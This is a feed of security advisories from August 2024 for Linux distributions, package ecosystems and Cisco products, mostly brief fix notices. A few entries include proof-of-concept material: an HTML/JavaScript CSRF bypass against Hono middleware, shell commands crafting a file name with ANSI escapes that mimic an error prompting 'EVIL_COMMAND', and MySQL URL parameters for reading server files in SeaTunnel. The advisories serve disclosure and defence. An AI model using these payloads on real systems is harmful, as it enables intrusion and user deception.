19.08.2024 18:54:38	ubuntu	[USN-6951-3] Linux kernel (Azure) vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6951-3
19.08.2024 18:04:17	ubuntu	[USN-6968-1] PostgreSQL vulnerability (high)	PostgreSQL could execute arbitrary SQL functions as the superuserif it received a specially crafted SQL object.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6968-1
19.08.2024 06:36:06	ubuntu	[USN-6966-1] Firefox vulnerabilities (critical)	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6966-1
20.08.2024 00:48:57	maven	[MAVEN:GHSA-R6PH-5FP2-3W2V] Microcks's POST /api/import and POST /api/export endpoints allow non-administrator access (moderate)	In Microcks before 1.10.0, the POST /api/import and POST /api/export endpoints allow non-administrator access.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R6PH-5FP2-3W2V
19.08.2024 03:28:21	ubuntu	[USN-6837-2] Rack vulnerabilities (medium)	Several security issues were fixed in Rack.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6837-2
19.08.2024 03:00:00	cisa	[CISA-2024:0819] CISA Adds One Known Exploited Vulnerability to Catalog	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0819
19.08.2024 03:00:00	debian	[DSA-5751-1] squid	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5751-1
20.08.2024 00:09:25	maven	[MAVEN:GHSA-H6JQ-W432-J26W] Silverpeas vulnerable to password complexity rule bypass (low)	An issue in the password change function of Silverpeas v6.4.2 and lower allows for the bypassing of password complexity requirements.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H6JQ-W432-J26W
20.08.2024 21:35:28	npm	[NPM:GHSA-VHR5-G3PM-49FM] matrix-js-sdk will freeze when a user sets a room with itself as a its predecessor (moderate)	### ImpactA malicious homeserver can craft a room or room structure such that the predecessors form a cycle. The matrix-js-sdk's `getRoomUpgradeHistory` function will infinitely recurse in this case, causing the code to hang. This method is public but also called by the 'leaveRoomChain()' method, so leaving a room will also trigger the bug.Even if the CVSS score would be 4.1 ([AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:L](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:L&version=3.1)) we classify this as High severity issue.### PatchesThis was patched in matrix-js-sdk 34.3.1.### WorkaroundsSanity check rooms before passing them to the matrix-js-sdk or avoid calling either `getRoomUpgradeHistory` or `leaveRoomChain`.### ReferencesN/A.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VHR5-G3PM-49FM
20.08.2024 21:15:39	ubuntu	[USN-6944-2] curl vulnerability	curl could be made to crash or expose information if it received speciallycrafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6944-2
20.08.2024 16:03:07	ubuntu	[USN-6970-1] exfatprogs vulnerability	exfatprogs could be made to crash or run programs if it handled a speciallycrafted partition.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6970-1
20.08.2024 14:14:34	ubuntu	[USN-6969-1] Cacti vulnerabilities	Several security issues were fixed in Cacti.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6969-1
21.08.2024 00:21:50	pypi	[PYSEC-2024-71] flask-cors vulnerability (high)	A vulnerability in corydolphin/flask-cors version 4.0.1 allows the `Access-Control-Allow-Private-Network` CORS header to be set to true by default, without any configuration option. This behavior can expose private network resources to unauthorized external access, leading to significant security risks such as data breaches, unauthorized access to sensitive information, and potential network intrusions.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-71
23.08.2024 21:52:48	maven	[MAVEN:GHSA-7CJ3-X93G-GJ76] Signature forgery in Spring Boot's Loader (moderate)	Applications that use spring-boot-loader or spring-boot-loader-classic and contain custom code that performs signature verification of nested jar files may be vulnerable to signature forgery where content that appears to have been signed by one signer has, in fact, been signed by another.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7CJ3-X93G-GJ76
23.08.2024 04:49:50	fedora	[FEDORA-2024-a562addefa] Fedora 40: iaito, radare2 (high)	Bump to version 5.9.4	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a562addefa
23.08.2024 04:24:55	fedora	[FEDORA-2024-c611359ae1] Fedora 39: community-mysql (medium)	MySQL 8.0.39Release notes:https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-38.htmlhttps://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-39.html	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c611359ae1
23.08.2024 04:24:53	fedora	[FEDORA-2024-3667e29b88] Fedora 39: iaito, radare2 (critical)	Bump to version 5.9.4	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3667e29b88
23.08.2024 17:03:08	rustsec	[RUSTSEC-2024-0365] Binary Protocol Misinterpretation caused by Truncating or Overflowing Casts	The following presentation at this year's DEF CON was brought to our attention on the Diesel Gitter Channel:> SQL Injection isn't Dead: Smuggling Queries at the Protocol Level > <http://web.archive.org/web/20240812130923/https://media.defcon.org/DEF%20CON%2032/DEF%20CON%2032%20presentations/DEF%20CON%2032%20-%20Paul%20Gerste%20-%20SQL%20Injection%20Isn't%20Dead%20Smuggling%20Queries%20at%20the%20Protocol%20Level.pdf> > (Archive link for posterity.)Essentially, encoding a value larger than 4GiB can cause the length prefix in the protocol to overflow, causing the server to interpret the rest of the string as binary protocol commands or other data.It appears Diesel _does_ perform truncating casts in a way that could be problematic, for example: <https://github.com/diesel-rs/diesel/blob/ae82c4a5a133db65612b7436356f549bfecda1c7/diesel/src/pg/connection/stmt/mod.rs#L36>This code has existed essentially since the beginning, so it is reasonable to assume that all published versions `<= 2.2.2` are affected.## MitigationThe prefered migration to the outlined problem is to update to a Diesel version newer than 2.2.2, which includes fixes for the problem. As always, you should make sure your application is validating untrustworthy user input. Reject any input over 4 GiB, or any input that could _encode_ to a string longer than 4 GiB. Dynamically built queries are also potentially problematic if it pushes the message size over this 4 GiB bound.For web application backends, consider adding some middleware that limits the size of request bodies by default.## ResolutionDiesel now uses `#[deny]` directives for the following Clippy lints:* [`cast_possible_truncation`](https://rust-lang.github.io/rust-clippy/master/#/cast_possible_truncation)* [`cast_possible_wrap`](https://rust-lang.github.io/rust-clippy/master/#/cast_possible_wrap)* [`cast_sign_loss`](https://rust-lang.github.io/rust-clippy/master/#/cast_sign_loss)to prevent casts that will lead to precision loss or other trunctations. Additionally we performed an audit of the relevant code.A fix is included in the `2.2.3` release.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0365
23.08.2024 03:00:00	cisa	[CISA-2024:0823] CISA Adds One Known Exploited Vulnerability to Catalog (medium)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0823
23.08.2024 03:00:00	debian	[DSA-5757-1] chromium (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5757-1
22.08.2024 22:15:09	alpinelinux	[ALPINE:CVE-2024-8088] python3 vulnerability (high)	[From CVE-2024-8088] There is a HIGH severity vulnerability affecting the CPython "zipfile"module.When iterating over names of entries in a zip archive (for example, methodsof "zipfile.ZipFile" like "namelist()", "iterdir()", "extractall()", etc)the process can be put into an infinite loop with a maliciously craftedzip archive. This defect applies when reading only metadata or extractingthe contents of the zip archive. Programs that are not handlinguser-controlled zip archives are not affected.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-8088
22.08.2024 19:41:09	npm	[NPM:GHSA-RPFR-3M35-5VX5] Hono CSRF middleware can be bypassed using crafted Content-Type header (moderate)	### SummaryHono CSRF middleware can be bypassed using crafted Content-Type header.### DetailsMIME types are case insensitive, but `isRequestedByFormElementRe` only matches lower-case.https://github.com/honojs/hono/blob/b0af71fbcc6dbe44140ea76f16d68dfdb32a99a0/src/middleware/csrf/index.ts#L16-L17As a result, attacker can bypass csrf middleware using upper-case form-like MIME type, such as "Application/x-www-form-urlencoded".### PoC```html<html> <head> <title>CSRF Test</title> <script defer> document.addEventListener("DOMContentLoaded", () => { document.getElementById("btn").addEventListener("click", async () => { const res = await fetch("http://victim.example.com/test", { method: "POST", credentials: "include", headers: { "Content-Type": "Application/x-www-form-urlencoded", }, }); }); }); </script> </head> <body> <h1>CSRF Test</h1> <button id="btn">Click me!</button> </body></html>```### ImpactBypass csrf protection implemented with hono csrf middleware.### DiscussionI'm not sure that omitting csrf checks for Simple POST request is a good idea.CSRF prevention and CORS are different concepts even though CORS can prevent CSRF in some cases.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RPFR-3M35-5VX5
22.08.2024 04:09:47	fedora	[FEDORA-2024-ba78b27eb8] Fedora 39: webkitgtk (critical)	Fix web process cache suspend/resume when sandbox is enabled.Fix accelerated images disappearing after scrolling.Fix video flickering with DMA-BUF sink.Fix pointer lock on X11.Fix movement delta on mouse events in GTK3.Undeprecate console message API and make it available in 2022 API.Fix several crashes and rendering issues.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ba78b27eb8
23.08.2024 02:15:02	rustsec	[RUSTSEC-2024-0364] gitoxide-core does not neutralize special characters for terminals (low)	### SummaryThe `gix` and `ein` commands write pathnames and other metadata literally to terminals, even if they contain characters terminals treat specially, including ANSI escape sequences. This sometimes allows an untrusted repository to misrepresent its contents and to alter or concoct error messages.### Details`gitoxide-core`, which provides most underlying functionality of the `gix` and `ein` commands, does not neutralize newlines, backspaces, or control characters—including those that form ANSI escape sequences—that appear in a repository's paths, author and committer names, commit messages, or other metadata. Such text may be written as part of the output of a command, as well as appearing in error messages when an operation fails.ANSI escape sequences are of particular concern because, when printed to a terminal, they can change colors, including to render subsequent text unreadable; reposition the cursor to write text in a different location, including where text has already been written; clear the terminal; set the terminal title-bar text to arbitrary values; render the terminal temporarily unusable; and other such operations.The effect is mostly an annoyance. But the author of a malicious repository who can predict how information from the repository may be accessed can cause files in the repository to be concealed or otherwise misrepresented, as well as rewrite all or part of error messages, or mimic error messages convincingly by repositioning the cursor and writing colored text.### PoCOn a Unix-like system in a POSIX-compatible shell, run:```shgit init misleading-pathcd misleading-pathtouch "$(printf '\033]0;Boo!\007\033[2K\r\033[91mError: Repository is corrupted. Run \033[96mEVIL_COMMAND\033[91m to attempt recovery.\033[0m')"git add .git commit -m 'Initial commit'```In the repository—or, if desired, in a clone of it, to show that this is exploitable by getting a user to clone an untrusted repository—run this command, which outputs entries in a three-column form showing type, hash, and filename:```shgix tree entries```Although the output is of that form, it does not appear to be. Instead, the output in a terminal looks like this, colorized to appear to be an error message, with `EVIL_COMMAND` in another color, and with no other text:```textError: Repository is corrupted. Run EVIL_COMMAND to attempt recovery.```In some terminals, a beep or other sound will be made. In most terminals, the title bar text will be changed to `Boo!`, though in some shells this may be immediately undone when printing the prompt. These elements are included to showcase the abilities of ANSI escape sequences, but they are not usually themselves threats.To see what is actually produced, `gix tree entries` can be piped to a command that displays special characters symbolically, such as `less` or `cat -v` if available.```textBLOB e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 ESC]0;Boo!^GESC[2K^MESC[91mError: Repository is corrupted. Run ESC[96mEVIL_COMMANDESC[91m to attempt recovery.ESC[0m```That shows the effect on `gix tree entries`, but various other commands are also affected, and the escape sequences and other special characters can also appear in non-path metadata, such as in the `user.name` used to create a commit.### ImpactFor users who do not clone or operate in clones of untrusted repositories, there is no impact.Windows is much less affected than Unix-like systems due to limitations on what characters can appear in filenames, and because traditionally Windows terminals do not support as many ANSI escape sequences.Because different `gix` and `ein` commands display different data in different formats, the author of a malicious repository must guess how it will be used, which complicates crafting truly convincing output, though it may be possible to craft a repository where `gix clone` fails to clone it but produces a misleading message.Although this is mainly exploitable on systems other than Windows, in the ability to produce misleading output this superficially resembles [CVE-2024-35197](https://github.com/advisories/GHSA-49jc-r788-3fc9). But this is much more limited, because:- The misleading output can only be made to go where the application is already sending output. Redirection is not defeated, and devices to access cannot be chosen by the attacker.- The misleading output can only be take place when the application is already producing output. This limitation complicates the production of believable messages.- Only terminals are affected. Even if a standard stream is redirected to another file or device, these special characters would not have a special effect, unless echoed later without sanitization.- Reading and blocking cannot be performed.- Applications other than the gitoxide `gix` and `ein` executables are unaffected. The exception is if another application uses `gitoxide-core`. But this is explicitly discouraged in the `gitoxide-core` documentation and is believed to be rare.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0364
21.08.2024 23:09:16	npm	[NPM:GHSA-W5PW-GMCW-RFC8] squirrelly Code Injection vulnerability (high)	squirrellyjs squirrelly v9.0.0 was discovered to contain a code injection vulnerability via the component `options.varName`. The issue was fixed in version 9.1.0.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W5PW-GMCW-RFC8
21.08.2024 21:59:32	npm	[NPM:GHSA-6V96-M24V-F58J] CKEditor4 low-risk cross-site scripting (XSS) vulnerability linked to potential domain takeover (low)	### Affected PackagesThe issue impacts only editor instances with enabled [version notifications](https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_config.html#cfg-versionCheck).Please note that this feature is disabled by default in all CKEditor 4 LTS versions. Therefore, if you use CKEditor 4 LTS, it is highly unlikely that you are affected by this vulnerability. If you are unsure, please [contact us](mailto:security@cksource.com).### ImpactA theoretical vulnerability has been identified in CKEditor 4.22 (and above). In a highly unlikely scenario where an attacker gains control over the https://cke4.ckeditor.com domain, they could potentially execute an attack on CKEditor 4 instances. Although the vulnerability is purely hypothetical, we have addressed it in CKEditor 4.25.0-lts to ensure compliance with security best practices.### PatchesThe issue has been recognized and patched. The fix is available in version 4.25.0-lts.### For More InformationIf you have any questions or comments about this advisory, please email us at [security@cksource.com](mailto:security@cksource.com).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6V96-M24V-F58J
21.08.2024 21:30:42	npm	[NPM:GHSA-7R32-VFJ5-C2JV] Code Snippet GeSHi plugin has reflected cross-site scripting (XSS) vulnerability (moderate)	### Affected packagesThe vulnerability has been discovered in [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. All integrators that use [GeSHi syntax highlighter](https://github.com/GeSHi/geshi-1.0) on the backend side can be affected.### ImpactA potential vulnerability has been discovered in CKEditor 4 [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. The vulnerability allowed a reflected XSS attack by exploiting a flaw in the [GeSHi syntax highlighter library](https://github.com/GeSHi/geshi-1.0) hosted by the victim.The GeSHi library was included as a vendor dependency in CKEditor 4 source files. In a specific scenario, an attacker could craft a malicious script that could be executed by sending a request to the GeSHi library hosted on a PHP web server.### PatchesThe [GeSHi library](https://github.com/GeSHi/geshi-1.0) is no longer actively maintained. Due to the lack of ongoing support and updates, potential security vulnerabilities have been identified with its continued use. To mitigate these risks and enhance the overall security of the CKEditor 4, we have decided to completely remove the GeSHi library as a dependency. This change aims to maintain a secure environment and reduce the risk of any security incidents related to outdated or unsupported software.To integrators who still want to use the GeSHi syntax highlighter, we recommend manually adding the [GeSHi library](https://github.com/GeSHi/geshi-1.0) . Please be aware of and understand the potential security vulnerabilities associated with its use.The fix is be available in version 4.25.0-lts.### AcknowledgementsThe CKEditor 4 team would like to thank [Jiasheng He](https://github.com/Hebing123) from Qihoo 360 for recognizing and reporting this vulnerability.### For more informationEmail us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7R32-VFJ5-C2JV
21.08.2024 19:00:00	cisco	[CISCO-SA-ISE-REST-5BPKRNTZ] Cisco Identity Services Engine REST API Blind SQL Injection Vulnerabilities (medium)	Multiple vulnerabilities in the REST API of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct blind SQL injection attacks.These vulnerabilities are due to insufficient validation of user-supplied input in REST API calls. An attacker could exploit these vulnerabilities by sending crafted input to an affected device. A successful exploit could allow the attacker to view or modify data on the affected device.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-REST-5BPKRNTZ
21.08.2024 19:00:00	cisco	[CISCO-SA-ISE-INFO-EXP-VDF8JBYK] Cisco Identity Services Engine Sensitive Information Disclosure Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain sensitive information from an affected device.This vulnerability is due to improper enforcement of administrative privilege levels for high-value sensitive data. An attacker with read-only Administrator privileges for the web-based management interface on an affected device could exploit this vulnerability by browsing to a page that contains sensitive data. A successful exploit could allow the attacker to collect sensitive information regarding the configuration of the system.Cisco has released software updates that address CSCwh78725 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwh78725"]. Cisco has not released software updates that address CSCwe48929 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwe48929"]. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-INFO-EXP-VDF8JBYK
21.08.2024 19:00:00	cisco	[CISCO-SA-ISE-CSRF-Y4ZUZ5RJ] Cisco Identity Services Engine Cross-Site Request Forgery Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the affected device with the privileges of the targeted user.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-CSRF-Y4ZUZ5RJ
21.08.2024 19:00:00	cisco	[CISCO-SA-CUCM-XSS-9ZMFHYZ] Cisco Unified Communications Manager Cross-Site Scripting Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUCM-XSS-9ZMFHYZ
21.08.2024 19:00:00	cisco	[CISCO-SA-CUCM-DOS-KKHQ43WE] Cisco Unified Communications Manager Denial of Service Vulnerability (high)	A vulnerability in the SIP call processing function of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to improper parsing of SIP messages. An attacker could exploit this vulnerability by sending a crafted SIP message to an affected Cisco Unified CM or Cisco Unified CM SME device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition that interrupts the communications of reliant voice and video devices.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUCM-DOS-KKHQ43WE
21.08.2024 23:08:40	maven	[MAVEN:GHSA-9623-MQMM-5RCF] Undertow vulnerable to Race Condition (high)	A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9623-MQMM-5RCF
21.08.2024 23:10:15	maven	[MAVEN:GHSA-8M84-H9HH-3CFH] Apache SeaTunnel SQL Injection vulnerability (high)	Mysql security vulnerability in Apache SeaTunnel.Attackers can read files on the MySQL server by modifying the information in the MySQL URL allowLoadLocalInfile=true&allowUrlInLocalInfile=true&allowLoadLocalInfileInPath=/&maxAllowedPacket=655360This issue affects Apache SeaTunnel: 1.0.0.Users are recommended to upgrade to version [1.0.1], which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8M84-H9HH-3CFH
21.08.2024 23:10:20	maven	[MAVEN:GHSA-6247-7862-Q2PQ] Apache Helix Front (UI) component contained a hard-coded secret (high)	The Apache Helix Front (UI) component contained a hard-coded secret, allowing an attacker to spoof sessions by generating their own fake cookies.This issue affects Apache Helix Front (UI): all versions.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6247-7862-Q2PQ
22.08.2024 03:00:00	freebsd	[FREEBSD:B339992E-6059-11EF-8A0F-A8A1599412C6] chromium -- multiple security fixes (high)	Chrome Releases reports: This update includes 38 security fixes: [358296941] High CVE-2024-7964: Use after free in Passwords. Reported by Anonymous on 2024-08-08 [356196918] High CVE-2024-7965: Inappropriate implementation in V8. Reported by TheDog on 2024-07-30 [355465305] High CVE-2024-7966: Out of bounds memory access in Skia. Reported by Renan Rios (@HyHy100) on 2024-07-25 [355731798] High CVE-2024-7967: Heap buffer overflow in Fonts. Reported by Tashita Software Security on 2024-07-27 [349253666] High CVE-2024-7968: Use after free in Autofill. Reported by Han Zheng (HexHive) on 2024-06-25 [351865302] High CVE-2024-7969: Type Confusion in V8. Reported by CFF of Topsec Alpha Team on 2024-07-09 [360700873] High CVE-2024-7971: Type confusion in V8. Reported by Microsoft Threat Intelligence Center (MSTIC), Microsoft Security Response Center (MSRC) on 2024-08-19 [345960102] Medium CVE-2024-7972: Inappropriate implementation in V8. Reported by Simon Gerst (intrigus-lgtm) on 2024-06-10 [345518608] Medium CVE-2024-7973: Heap buffer overflow in PDFium. Reported by soiax on 2024-06-06 [339141099] Medium CVE-2024-7974: Insufficient data validation in V8 API. Reported by bowu(@gocrashed) on 2024-05-07 [347588491] Medium CVE-2024-7975: Inappropriate implementation in Permissions. Reported by Thomas Orlita on 2024-06-16 [339654392] Medium CVE-2024-7976: Inappropriate implementation in FedCM. Reported by Alesandro Ortiz on 2024-05-10 [324770940] Medium CVE-2024-7977: Insufficient data validation in Installer. Reported by Kim Dong-uk (@justlikebono) on 2024-02-11 [40060358] Medium CVE-2024-7978: Insufficient policy enforcement in Data Transfer. Reported by NDevTK on 2022-07-21 [356064205] Medium CVE-2024-7979: Insufficient data validation in Installer. Reported by VulnNoob on 2024-07-29 [356328460] Medium CVE-2024-7980: Insufficient data validation in Installer. Reported by VulnNoob on 2024-07-30 [40067456] Low CVE-2024-7981: Inappropriate implementation in Views. Reported by Thomas Orlita on 2023-07-14 [350256139] Low CVE-2024-8033: Inappropriate implementation in WebApp Installs. Reported by Lijo A.T on 2024-06-30 [353858776] Low CVE-2024-8034: Inappropriate implementation in Custom Tabs. Reported by Bharat (mrnoob) on 2024-07-18 [40059470] Low CVE-2024-8035: Inappropriate implementation in Extensions. Reported by Microsoft on 2022-04-26	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B339992E-6059-11EF-8A0F-A8A1599412C6
22.08.2024 03:00:00	freebsd	[FREEBSD:ADDC71B8-6024-11EF-86A1-8C164567CA3C] nginx -- Vulnerability in the ngx_http_mp4_module (medium)	The nginx development team reports: This update fixes the buffer overread vulnerability in the ngx_http_mp4_module.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:ADDC71B8-6024-11EF-86A1-8C164567CA3C
24.08.2024 04:53:58	fedora	[FEDORA-2024-8382d1b267] Fedora 40: zabbix (critical)	Fix for multiple CVEs	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8382d1b267
24.08.2024 04:53:46	fedora	[FEDORA-2024-d434721ef8] Fedora 40: python3.9 (medium)	Security fix for CVE-2024-4032 and CVE-2024-6923	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d434721ef8
24.08.2024 04:30:56	fedora	[FEDORA-2024-c89d2ecdea] Fedora 39: zabbix (critical)	Fix for multiple CVEs	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c89d2ecdea
24.08.2024 04:30:51	fedora	[FEDORA-2024-b7de0faa8b] Fedora 39: python3.9 (medium)	Security fix for CVE-2024-4032 and CVE-2024-6923	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b7de0faa8b
25.08.2024 07:44:24	fedora	[FEDORA-2024-bed028af54] Fedora 40: python3.11 (medium)	Security fix for CVE-2024-4032 (rhbz#2293391)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-bed028af54
25.08.2024 05:02:27	fedora	[FEDORA-2024-a4c978fa1c] Fedora 39: python3.11 (medium)	Security fix for CVE-2024-4032 (rhbz#2293391)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a4c978fa1c
25.08.2024 03:00:00	freebsd	[FREEBSD:49EF501C-62B6-11EF-BBA5-2CF05DA270F3] Gitlab -- vulnerabilities (medium)	Gitlab reports: The GitLab Web Interface Does Not Guarantee Information Integrity When Downloading Source Code from Releases Denial of Service by importing maliciously crafted GitHub repository Prompt injection in "Resolve Vulnerabilty" results in arbitrary command execution in victim's pipeline An unauthorized user can perform certain actions through GraphQL after a group owner enables IP restrictions	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:49EF501C-62B6-11EF-BBA5-2CF05DA270F3
26.08.2024 18:17:42	npm	[NPM:GHSA-6JRJ-VC65-C983] unzip-stream allows Arbitrary File Write via artifact extraction (high)	### ImpactWhen using the `Extract()` method of unzip-stream, malicious zip files were able to write to paths they shouldn't be allowed to.### PatchesFixed in 0.3.2### References- https://snyk.io/research/zip-slip-vulnerability- https://github.com/mhr3/unzip-stream/compare/v0.3.1...v0.3.2### CreditsJustin Taft from Google	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6JRJ-VC65-C983
26.08.2024 12:52:00	suse	[SUSE-SU-2024:3010-1] Security update for xen (important)	Security update for xen	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3010-1
26.08.2024 05:05:36	fedora	[FEDORA-2024-a6817a2e80] Fedora 40: python-webob (medium)	Update to upstream. Fix open redirect issue in 1.8-branch rhbz#2305065Update to upstream. Fix open redirect issue in 1.8-branch rhbz#2305065	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a6817a2e80
26.08.2024 05:05:22	fedora	[FEDORA-2024-6ba57fd2a3] Fedora 40: nginx-mod-fancyindex, nginx, nginx-mod-naxsi, nginx-mod-vts, nginx-mod-modsecurity (medium)	Security: processing of a specially crafted mp4 file by the ngx_http_mp4_module might cause a worker process crash (CVE-2024-7347). Thanks to Nils Bars.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6ba57fd2a3
26.08.2024 05:05:13	fedora	[FEDORA-2024-80d1fe51d0] Fedora 40: python3-docs, python3.12 (medium)	Update to 3.12.5Fixes CVE-2024-6923 (email header injection)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-80d1fe51d0
26.08.2024 04:32:10	fedora	[FEDORA-2024-40ff0d8644] Fedora 39: python-webob (medium)	Update to upstream. Fix open redirect issue in 1.8-branch rhbz#2305065Update to upstream. Fix open redirect issue in 1.8-branch rhbz#2305065	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-40ff0d8644
26.08.2024 04:31:55	fedora	[FEDORA-2024-8ba5080dfa] Fedora 39: nginx, nginx-mod-naxsi, nginx-mod-vts, nginx-mod-fancyindex, nginx-mod-modsecurity (medium)	Security: processing of a specially crafted mp4 file by the ngx_http_mp4_module might cause a worker process crash (CVE-2024-7347). Thanks to Nils Bars.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8ba5080dfa
26.08.2024 04:31:50	fedora	[FEDORA-2024-ce1992d46f] Fedora 39: python3.12, python3-docs (medium)	Update to 3.12.5Fixes CVE-2024-6923 (email header injection)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ce1992d46f
26.08.2024 21:11:53	almalinux	[ALSA-2024:5815] nodejs:20 security update (moderate)	nodejs:20 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5815
26.08.2024 21:53:15	almalinux	[ALSA-2024:5814] nodejs:20 security update (moderate)	nodejs:20 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5814
26.08.2024 03:00:00	cisa	[CISA-2024:0826] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0826
26.08.2024 03:00:00	debian	[DSA-5758-1] trafficserver (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5758-1
